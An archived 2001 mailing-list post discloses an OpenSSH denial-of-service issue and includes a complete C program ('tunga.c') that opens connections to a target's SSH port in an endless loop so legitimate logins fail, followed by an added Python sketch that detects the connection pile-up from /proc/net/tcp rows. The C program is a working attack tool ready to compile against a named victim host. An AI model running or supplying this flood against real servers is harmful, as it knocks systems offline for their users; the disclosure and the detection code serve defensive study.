Vulnerability Development mailing list archives

Possible OpenSSH DoS Attack


From: "Pedro Inacio" <drbrain () phibernet org>
Date: Mon, 10 Dec 2001 23:19:18 -0000

--[ OpenSSH DoS Attack proof of concept ]--
  by DrBrain <drbrain () phibernet org> / http://www.phibernet.org


--[ Intro ]--

After some tests with sshd, I have noticed that it is possible to generate a
DoS attack that gives you the following message when you try to contact the
service:

----------
$ ssh user () somehost com
ssh_exchange_identification: Connection closed by remote host
----------

This just happens while running the code below, because when you stop
running it everything works fine.

It seems to be a known problem (
http://www.snailbook.com/faq/libwrap-oops.auto.html ), but until now there
is no patch available and this problem is present in all OpenSSH versions.

Although, there is an advisory to compile the SSH server with libwrap
(TCP-wrappers) support and then add some rules in /etc/hosts.{allow,deny} in
order to allow connections to sshd from any source address.

Anyway, I have made some tests and ALL the machines were vulnerable.
In my opinion it is urgent to fix this as soon as possible.

--[ Code ]--

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdio.h>
#include <unistd.h>

int main (int argc, char *argv[]) {

  int sd, rc;
  struct sockaddr_in localAddr, servAddr;
  struct linger ling;
  struct hostent *h;

  if(argc < 3) {
    printf("tunga.c - OpenSSH DoS Attack\n");
    printf("by DrBrain <drbrain () phibernet org>\n");
    printf("Phibernet Information Network < http://www.phibernet.org\n\n");
    printf("Usage: %s <victim> <port>\n\n",argv[0]);
    exit(1);
  }

  h = gethostbyname(argv[1]);
  if(h==NULL) {
    printf("%s: Unknown Host '%s'\n",argv[0],argv[1]);
    exit(1);
  }

  for(;;) {
    servAddr.sin_family = h->h_addrtype;
    memcpy((char *) &servAddr.sin_addr.s_addr, h->h_addr_list[0],
h->h_length);
    servAddr.sin_port = htons(atoi(argv[2]));

    sd = socket(AF_INET, SOCK_STREAM, 0);
    if(sd<0) {
      perror("Cannot Open Socket ");
      exit(1);
    }

    rc = connect(sd, (struct sockaddr *) &servAddr, sizeof(servAddr));
    if(rc<0) {
      perror("Cannot Connect ");
      exit(1);
    }
  }
  exit(0);
}


That's it!

I would like to thank megas and FatZU and all the guys in Phibernet for
helping me with some machines while testing the DoS.

-- DrBrain
"If you don't have a hammer, hack it" ;)

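--[ Added example: spotting the connection pile-up on the server ]--

The following is an added example, not part of the original post. The loop above opens connection after connection from one source to the sshd port, so a per-source count of connections on that port shows it. The sketch parses rows in /proc/net/tcp layout; the sample rows, the threshold of 5 and the little-endian host are assumptions.

```python
import socket
from collections import Counter

# Constructed sample rows in /proc/net/tcp layout (little-endian host assumed).
SAMPLE = """\
  sl  local_address rem_address   st
   0: 00000000:0016 00000000:0000 0A
   1: 0A00000A:0016 0500000A:C350 01
   2: 0A00000A:0016 0500000A:C351 01
   3: 0A00000A:0016 0500000A:C352 01
   4: 0A00000A:0016 0500000A:C353 03
   5: 0A00000A:0016 0500000A:C354 01
   6: 0A00000A:0016 0500000A:C355 01
   7: 0A00000A:0016 070200C0:D431 01
   8: 0A00000A:0050 0500000A:C360 01
"""

COUNTED_STATES = {"01", "03"}  # ESTABLISHED, SYN_RECV


def decode_endpoint(field):
    """Turn 'HHHHHHHH:PPPP' into (dotted_ip, port)."""
    ip_hex, port_hex = field.split(":")
    # The kernel prints the address in host byte order, so reverse the bytes.
    ip = socket.inet_ntoa(bytes.fromhex(ip_hex)[::-1])
    return ip, int(port_hex, 16)


def connections_per_source(table, port=22):
    """Count connections to `port` per remote IP, skipping the header row."""
    counts = Counter()
    for line in table.splitlines()[1:]:
        cols = line.split()
        if len(cols) < 4 or cols[3] not in COUNTED_STATES:
            continue  # listening sockets and other states are ignored
        _, local_port = decode_endpoint(cols[1])
        remote_ip, _ = decode_endpoint(cols[2])
        if local_port == port:
            counts[remote_ip] += 1
    return counts


def noisy_sources(table, port=22, threshold=5):
    """Return {ip: count} for sources holding more than `threshold` connections."""
    per_source = connections_per_source(table, port)
    return {ip: n for ip, n in per_source.items() if n > threshold}


if __name__ == "__main__":
    for ip, n in noisy_sources(SAMPLE).items():
        print(f"{ip} holds {n} connections to port 22")
```

On a live Linux host the same functions can be fed the contents of /proc/net/tcp in place of SAMPLE.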

